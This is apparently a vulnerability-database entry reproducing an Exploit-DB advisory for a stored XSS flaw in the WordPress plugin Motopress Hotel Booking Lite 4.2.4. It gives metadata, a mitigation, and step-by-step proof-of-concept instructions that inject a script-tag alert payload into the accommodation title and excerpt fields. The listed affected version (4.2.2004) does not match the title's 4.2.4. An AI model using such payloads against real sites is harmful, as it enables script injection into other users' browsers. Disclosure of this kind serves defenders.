WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - Stored Cross-Site Scripting (XSS)

vendor:

Motopress Hotel Booking Lite

by:

Sanjay Singh

8.8

CVSS

HIGH

Stored Cross-Site Scripting (XSS)

CWE

Product Name: Motopress Hotel Booking Lite

Affected Version From: 4.2.2004

Affected Version To: 4.2.2004

Patch Exists: YES

Related CWE:

CPE: a:motopress:motopress_hotel_booking_lite

Metasploit:

Other Scripts:

Platforms Tested: Windows/XAMPP

2022

WordPress Plugin Motopress Hotel Booking Lite 4.2.4 – Stored Cross-Site Scripting (XSS)

A stored Cross-Site Scripting (XSS) vulnerability exists in WordPress Plugin Motopress Hotel Booking Lite version 4.2.4. An attacker can inject malicious JavaScript code into the title and excerpt input fields of the 'Add Accommodation Type' page, which is then stored in the database and executed when the page is visited. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of the affected site.

Mitigation:

Update to the latest version of the WordPress Plugin Motopress Hotel Booking Lite.

Source

Exploit-DB raw data:

# Exploit Title: WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - Stored Cross-Site Scripting (XSS)
# Date: 2022-06-05
# Exploit Author: Sanjay Singh
# Vendor Homepage: https://motopress.com/
# Software Link: https://downloads.wordpress.org/plugin/motopress-hotel-booking-lite.4.2.4.zip
# Version: 4.2.4
# Tested on: Windows/XAMPP
###########################################################################
PoC:

1. http://localhost/wp-admin/edit.php?post_type=mphb_room_type
2. Click on "Add Accommodation Type".
3. Add title payload= "><script>alert("XSS")</script>
4. Excerpt input payload "><script>alert("XSS")</script>
5. Click publish.
6. Visit http://localhost/accommodations/
7. XSS payload execute.